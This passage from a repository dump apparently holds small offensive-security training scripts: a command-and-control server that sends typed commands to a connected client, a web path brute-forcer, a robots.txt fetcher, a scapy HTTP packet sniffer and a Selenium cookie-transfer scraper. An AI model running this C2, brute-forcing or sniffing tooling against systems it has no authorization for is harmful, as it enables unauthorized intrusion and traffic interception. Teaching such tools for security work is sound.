'__main__':\r\n\tmain()" }, { "path": "socket_c2_server.py", "content": "import socket\r\nimport sys\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\thost = '127.0.0.1'\r\n\tport = 777\r\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n\t\tprint(f'Listening on {host} port {port}')\r\n\t\ts.bind((host,port))\r\n\t\ts.listen()\r\n\t\twhile True:\r\n\t\t\tconn, addr = s.accept()\r\n\t\t\twith conn:\r\n\t\t\t\tprint(f'Connection! {addr[0]}')\r\n\t\t\t\tlisten_results(conn)\r\n\r\ndef listen_results(conn):\r\n\twhile True:\r\n\t\tresults = conn.recv(4096).decode('utf-8')\r\n\t\tprint(f'-------- Received Message from Client --------')\r\n\t\tprint(results)\r\n\t\tcommand = input('Send command to client: ')\r\n\t\tconn.sendall(command.encode('utf-8'))\r\n\t\tif command == 'die':\r\n\t\t\tsys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n\tmain()" }, { "path": "web_brute.py", "content": "import requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(filename, base_url):\r\n\twith open(filename, 'r') as file:\r\n\t\tfor uri in file.readlines():\r\n\t\t\turl = f'{base_url}{uri.strip()}'\r\n\t\t\tcheck_url(url)\r\n\r\ndef check_url(url):\r\n\ttry:\r\n\t\th = {'user-agent':'firefox'}\r\n\t\tresponse = requests.get(url, headers=h)\r\n\t\tif response.status_code == 200:\r\n\t\t\tprint(f'{url} is good!')\r\n\texcept:\r\n\t\tprint(f'{url} is bad')\r\n\t\tpass\r\n\r\nif __name__ == '__main__':\r\n\tbase_url = sys.argv[1].rstrip('/')\r\n\tfilename = sys.argv[2]\r\n\tmain(filename, base_url)" }, { "path": "web_robots.py", "content": "import requests\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url):\r\n robot_url = f'{url}/robots.txt'\r\n response = requests.get(robot_url)\r\n print(response.text)\r\n\r\nif __name__ == \"__main__\":\r\n\turl = sys.argv[1]\r\n main(url)\r\n" }, { "path": "web_sniff.py", "content": "from scapy.all import *\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\tsniff(prn=http_header, filter=\"tcp port 80\")\r\n\r\ndef http_header(packet):\r\n\thttp_packet=str(packet)\r\n\tif http_packet.find('GET'):\r\n\t\treturn print_packet(packet)\r\n\r\ndef print_packet(packet1):\r\n\tret = \"-------------------------------[ Received Packet ] -------------------------------\\n\"\r\n\tret += \"\\n\".join(packet1.sprintf(\"{Raw:%Raw.load%}\\n\").split(r\"\\r\\n\"))\r\n\tret += \"---------------------------------------------------------------------------------\\n\"\r\n\treturn ret\r\n\r\nif __name__ == '__main__':\r\n\tmain()" }, { "path": "web_spa.py", "content": "import sys\r\nfrom bs4 import *\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom requestium import Session\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url):\r\n\tsession = Session(webdriver_path='../Chrome Canary/chromedriver.exe',\r\n\t\tbrowser='chrome',\r\n\t\tdefault_timeout=6,\r\n\t\twebdriver_options={\r\n\t\t\t'arguments': [\r\n\t\t\t\t'disable-logging',\r\n\t\t\t\t'headless'\r\n\t\t\t]\r\n\t\t}\r\n\t)\r\n\r\n\tsession.driver.get(url)\r\n\tdiv_content = WebDriverWait(session.driver, 5).until(\r\n\t\tEC.presence_of_element_located(\r\n\t\t\t(By.XPATH, \"//div[@id='content']\")\r\n\t\t)\r\n\t)\r\n\tprint('######## FROM SELENIUM ########')\r\n\tprint(div_content.text)\r\n\r\n\tprint('######## COPYING SESSION FROM SELENIUM TO REQUESTS ########')\r\n\tsession.transfer_driver_cookies_to_session()\r\n\tfinal_response = session.get(url, headers={'user-agent':'custom requestium'})\r\n\r\n\tsoup = BeautifulSoup(final_response.text, 'html.parser')\r\n\tprint('######## FROM REQUESTS ########')\r\n\tbody_text = soup.find(id=\"content\")\r\n\tprint(body_text.text)\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tmain(url)\r\n\r\n" } ]